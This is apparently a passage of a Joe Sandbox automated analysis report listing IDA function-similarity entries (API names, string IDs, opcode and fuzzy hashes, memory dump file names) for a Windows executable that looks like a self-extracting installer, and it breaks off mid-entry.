                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@wsprintf
                                                                                                                                              • String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                                                                              • API String ID: 3815514257-695273242
                                                                                                                                              • Opcode ID: b68de83e7609139fb20ad7cd3bfa72029f9c98ba13a05740fc13380bcd36da3a
                                                                                                                                              • Instruction ID: 05a19e8dbc1aa1e74f1fd7cf93fc91e611ef78269a86e53d9d91e7162cf53db0
                                                                                                                                              • Opcode Fuzzy Hash: b68de83e7609139fb20ad7cd3bfa72029f9c98ba13a05740fc13380bcd36da3a
                                                                                                                                              • Instruction Fuzzy Hash: DA61BCB2214AC486DB22DF26E4507E97B65F38CFC4F889022FB8917736CA38D956C741
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$FileTime$??2@AttributesSystemlstrlen
                                                                                                                                              • String ID: /$:
                                                                                                                                              • API String ID: 655742493-4222935259
                                                                                                                                              • Opcode ID: dd5954d8c9b333a9d136ef2743a0e17e7176797595a3f252e1a1630f843e15e8
                                                                                                                                              • Instruction ID: 204d4deadc9c1c9af7b1f3401057d94cdc20ba81ee9c8070c7af536f9282148a
                                                                                                                                              • Opcode Fuzzy Hash: dd5954d8c9b333a9d136ef2743a0e17e7176797595a3f252e1a1630f843e15e8
                                                                                                                                              • Instruction Fuzzy Hash: 324194E260478191FB26EF27B4453EE62A0B798BC8F04C525BB46476F7DFB8C9468344
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@Item$??2@MessageSendTextWindowwsprintf
                                                                                                                                              • String ID: %d%%
                                                                                                                                              • API String ID: 2523864657-1518462796
                                                                                                                                              • Opcode ID: 022ee7b9a64e146fac015294ed00629a205f26cfd5e2d398972c04f10dfa1459
                                                                                                                                              • Instruction ID: 1249c9a84126987a876fe57f5b36ab08ace7640cd4c69084e92d84cb419e6ca5
                                                                                                                                              • Opcode Fuzzy Hash: 022ee7b9a64e146fac015294ed00629a205f26cfd5e2d398972c04f10dfa1459
                                                                                                                                              • Instruction Fuzzy Hash: 1D4144B6214A4082EB16EB53E4843E96361F7DCBC0F449026EB4E07BA6CF38D9448700
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemMessageSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3015471070-0
                                                                                                                                              • Opcode ID: c4b56a63531a7fc770b72e8e47d9c50213d54845c5136c61150501375676a7ef
                                                                                                                                              • Instruction ID: c4a91567c9a62339a9e2cc015e6f1bd1ba8c0a46430999c3573540af0017bbf6
                                                                                                                                              • Opcode Fuzzy Hash: c4b56a63531a7fc770b72e8e47d9c50213d54845c5136c61150501375676a7ef
                                                                                                                                              • Instruction Fuzzy Hash: 0E11F339200A91CAEB55AB93F9547AA7221F7DCFD9F149038AF4E43B25CE3CD8958701
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionThrow$??3@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3542664073-0
                                                                                                                                              • Opcode ID: 231644aacb3c423078e7a94a14247a68a82b04c16bb89c5738d3aa7134bd2362
                                                                                                                                              • Instruction ID: d01a700a2de283df8a41960e6a11a60be9a911b58a352c6303089c7e6c0055bc
                                                                                                                                              • Opcode Fuzzy Hash: 231644aacb3c423078e7a94a14247a68a82b04c16bb89c5738d3aa7134bd2362
                                                                                                                                              • Instruction Fuzzy Hash: 12A14F32204A8496DB62EB26E4503DEB7A0F79D7C4F500116FB9D47AB6DF79C519C700
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$??2@
                                                                                                                                              • String ID: %%S$%%S/$%%S\
                                                                                                                                              • API String ID: 4113381792-1963631775
                                                                                                                                              • Opcode ID: 007b2b91da7e23ea7f51a79bb729fbefc66f2d4b6f3c73570940850c343cb5a8
                                                                                                                                              • Instruction ID: f756c1b88a9fad531d898eb76b8b724e8215e29ba3ca3f21adb70f42b67ed2c7
                                                                                                                                              • Opcode Fuzzy Hash: 007b2b91da7e23ea7f51a79bb729fbefc66f2d4b6f3c73570940850c343cb5a8
                                                                                                                                              • Instruction Fuzzy Hash: B241D972224A4482DB22DF16E4513EA6371F7D8BD9F804112FB8D476A9DF7CCA06CB50
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$??2@
                                                                                                                                              • String ID: %%M$%%M/$%%M\
                                                                                                                                              • API String ID: 4113381792-1781175070
                                                                                                                                              • Opcode ID: e0b6aaf4fb19825d7c157027b3f84ef4c0cbdd7b673abe16368bc84d168324c0
                                                                                                                                              • Instruction ID: 70eacf09e81d2ee5294c27d3c84cffa05e7130210fc71bb2086171f2c582b56b
                                                                                                                                              • Opcode Fuzzy Hash: e0b6aaf4fb19825d7c157027b3f84ef4c0cbdd7b673abe16368bc84d168324c0
                                                                                                                                              • Instruction Fuzzy Hash: 8F41FC76224A4482DB22DF16E4513EA6371F798BD8F804112F78D47669DF7CCA06CB50
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$??2@
                                                                                                                                              • String ID: %%T$%%T/$%%T\
                                                                                                                                              • API String ID: 4113381792-3604420949
                                                                                                                                              • Opcode ID: cfd273dc6d7ca010bbfd72c8a44aeed8bc668a2ba1bbffed95ac8f77608bf74a
                                                                                                                                              • Instruction ID: 1f365825513f6e0002050aad4b13c09ca0367895ce49e1d5aab9d307dc0b841d
                                                                                                                                              • Opcode Fuzzy Hash: cfd273dc6d7ca010bbfd72c8a44aeed8bc668a2ba1bbffed95ac8f77608bf74a
                                                                                                                                              • Instruction Fuzzy Hash: A941FC72224A4482DB62DF12E4513EA6371F7D8BD9F804112FB8D47669DF3CCA46CB50
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MetricsSystem$Item$??3@
                                                                                                                                              • String ID: 100%%
                                                                                                                                              • API String ID: 1133332389-568723177
                                                                                                                                              • Opcode ID: 2c2980ac3c39602ea84bc50d8245f4954aa6ca629597dcad22d3da37a4d1cfdb
                                                                                                                                              • Instruction ID: 78062f72055337943d348d61c27d2a2be32fe35460fac1f231baca77d68c4b72
                                                                                                                                              • Opcode Fuzzy Hash: 2c2980ac3c39602ea84bc50d8245f4954aa6ca629597dcad22d3da37a4d1cfdb
                                                                                                                                              • Instruction Fuzzy Hash: AF414CB2600A468BEB52DF7AE44439933B1F788B99F108119FB4E472A9DF38CC45CB44
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Thread$DialogTimer$KillResumeSuspendTerminate
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 815346346-0
                                                                                                                                              • Opcode ID: 832395ea01292b53d140b31708a0fd6863c50b6fed3c115d85d62b1df24cc5db
                                                                                                                                              • Instruction ID: 8af0ce400ee544ebe74d39181c7fcb3ff7c2a5a6b2e56dded6902efb854025b5
                                                                                                                                              • Opcode Fuzzy Hash: 832395ea01292b53d140b31708a0fd6863c50b6fed3c115d85d62b1df24cc5db
                                                                                                                                              • Instruction Fuzzy Hash: 4E21F971200600C2FB16DB67F9547E823A1EBDDBC5F544418EB4A07679DF39C885CB41
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcmp
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1475443563-0
                                                                                                                                              • Opcode ID: 5eec308ff3e5f41247edd94b972dd0602c8af8b31ef93064b0923f42054cba1a
                                                                                                                                              • Instruction ID: e3ddd6e6c3e081b2e746f117fd3f894aaa58a36aca3bed80d8eb01e15409cc88
                                                                                                                                              • Opcode Fuzzy Hash: 5eec308ff3e5f41247edd94b972dd0602c8af8b31ef93064b0923f42054cba1a
                                                                                                                                              • Instruction Fuzzy Hash: A5413BB1218B41C1FB11AF67D8503E863A6AB5DFC4F845015EF0A8F3AAEF35CA058344
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$memcpy
                                                                                                                                              • String ID: MZ`
                                                                                                                                              • API String ID: 368790112-2330268423
                                                                                                                                              • Opcode ID: 5d30ba0483c92e9cacd345f037355ad7bb9e39ae956c386603695625c66f6f0a
                                                                                                                                              • Instruction ID: 8dc85a1fb84167b2412f383916e119258885706ac79a51b604a51d09ec214bd9
                                                                                                                                              • Opcode Fuzzy Hash: 5d30ba0483c92e9cacd345f037355ad7bb9e39ae956c386603695625c66f6f0a
                                                                                                                                              • Instruction Fuzzy Hash: F7B1B4727047C0A7EB69CB22F5543EE77A0F389384F40012AEB8957A92DB39E475CB10
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionThrow$??3@$??2@memcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4165819386-0
                                                                                                                                              • Opcode ID: 4acece95a5e8ebec4167dd6fc381e80c5bb31d4482c290026559e9632fb447d9
                                                                                                                                              • Instruction ID: a7e2a8e14197d125a092fd650603ed9034885d35ec5d2ba7903c9d65a4cec536
                                                                                                                                              • Opcode Fuzzy Hash: 4acece95a5e8ebec4167dd6fc381e80c5bb31d4482c290026559e9632fb447d9
                                                                                                                                              • Instruction Fuzzy Hash: 4591C07220078496EB22DB66D4847EE77A0F78D7D4F440126FB8E4BBA6DB3AC415CB00
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$??3@$??2@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3516945703-0
                                                                                                                                              • Opcode ID: 20c755d16aa4bf91e3a19b48a693d9da88bd2ae10b30367354b1751bf6518cb6
                                                                                                                                              • Instruction ID: cf4f8c7fb012e33594a7d47d355e787bf860c74e0a18c5e7f084cb80daf98719
                                                                                                                                              • Opcode Fuzzy Hash: 20c755d16aa4bf91e3a19b48a693d9da88bd2ae10b30367354b1751bf6518cb6
                                                                                                                                              • Instruction Fuzzy Hash: 9151BD7270064096EB228F67E484BEE67A5F74DBC4F854126EF4C4B766EB3AC5068300
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionThrow$??2@??3@memcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 343384133-0
                                                                                                                                              • Opcode ID: f690bcb228182c14dbcc26602bf1d39fab97e79a36fb3531eb706b5a204b1e19
                                                                                                                                              • Instruction ID: 251288029fd6d814545ef55a40716c1e93e4fbf20d878d01e14fdd6d2e0fa8b4
                                                                                                                                              • Opcode Fuzzy Hash: f690bcb228182c14dbcc26602bf1d39fab97e79a36fb3531eb706b5a204b1e19
                                                                                                                                              • Instruction Fuzzy Hash: BB216D72211B8481EB09DF26D4803E8B7A5F78CBC4F548416EB1D5B7BADB79C982C740
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@
                                                                                                                                              • String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                                                                                              • API String ID: 613200358-372238525
                                                                                                                                              • Opcode ID: ba87d413b51fb84e4b59b4bb6ab10b4812675b42b2860b74db798402a4b1df6c
                                                                                                                                              • Instruction ID: 076db66685e813d8d3cd1b4408f64ac1fb14b56a106a12c9e1af531cca41882b
                                                                                                                                              • Opcode Fuzzy Hash: ba87d413b51fb84e4b59b4bb6ab10b4812675b42b2860b74db798402a4b1df6c
                                                                                                                                              • Instruction Fuzzy Hash: 92513972618A8482EB22DF12E4513EAA7A0F7997D4F540215FB8D4B6AADB3DC605CB00
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$??2@ItemTextWindowwsprintf
                                                                                                                                              • String ID: (%d%s)
                                                                                                                                              • API String ID: 19352476-2087557067
                                                                                                                                              • Opcode ID: 91a4cb156418712f142d02a16fbac192e066cee43a3a92aaca2c1be05a4db6d3
                                                                                                                                              • Instruction ID: bf222e68f35a76b031a8f0e99b83192b3962dc3eef2abcfa1120ff20973cd401
                                                                                                                                              • Opcode Fuzzy Hash: 91a4cb156418712f142d02a16fbac192e066cee43a3a92aaca2c1be05a4db6d3
                                                                                                                                              • Instruction Fuzzy Hash: 14213A7261464586DB21EF22F4543EA7361FB9CBC8F404125FB890BBA9DE3CC94ACB40
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressLibraryLoadProcWindow
                                                                                                                                              • String ID: SetWindowTheme$uxtheme
                                                                                                                                              • API String ID: 1082215438-1369271589
                                                                                                                                              • Opcode ID: d90caa569c4dc83b0459c49e91b5fbbe0d300bad528571ccade65210cb2a39d4
                                                                                                                                              • Instruction ID: 0892ec2b5f8f95056378a950c5d512579efc54aba6643401d52d3a13ea2d8b64
                                                                                                                                              • Opcode Fuzzy Hash: d90caa569c4dc83b0459c49e91b5fbbe0d300bad528571ccade65210cb2a39d4
                                                                                                                                              • Instruction Fuzzy Hash: A7F0F470301A4191EF56DB93F8947E563A1AB9DBC0F5D9039AA4E0B7B4EE3DC9998300
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$lstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2031685711-0
                                                                                                                                              • Opcode ID: 61bf2eb809446b2d572152a20fda177439db6804f90a6e0e1c439bc51ef1e70a
                                                                                                                                              • Instruction ID: ad70323f6a8c741412e2200e79952b208abd6a5516909cdfef4a2f6db5847d87
                                                                                                                                              • Opcode Fuzzy Hash: 61bf2eb809446b2d572152a20fda177439db6804f90a6e0e1c439bc51ef1e70a
                                                                                                                                              • Instruction Fuzzy Hash: 7B31CEB2604A4481EB22EF22F4913EF63A1F789BC4F448022FB4A476B6DF7DC9458741
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@Item$Timer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4119539950-0
                                                                                                                                              • Opcode ID: 8dbbb87c90dc95c51b739d07fbf2f3a0a59703ca1f4a3bec119e197961c230f4
                                                                                                                                              • Instruction ID: a63ae0be2eaf2c453743e4c4373b079b57b03e8f6d4fee9bda414248858a712d
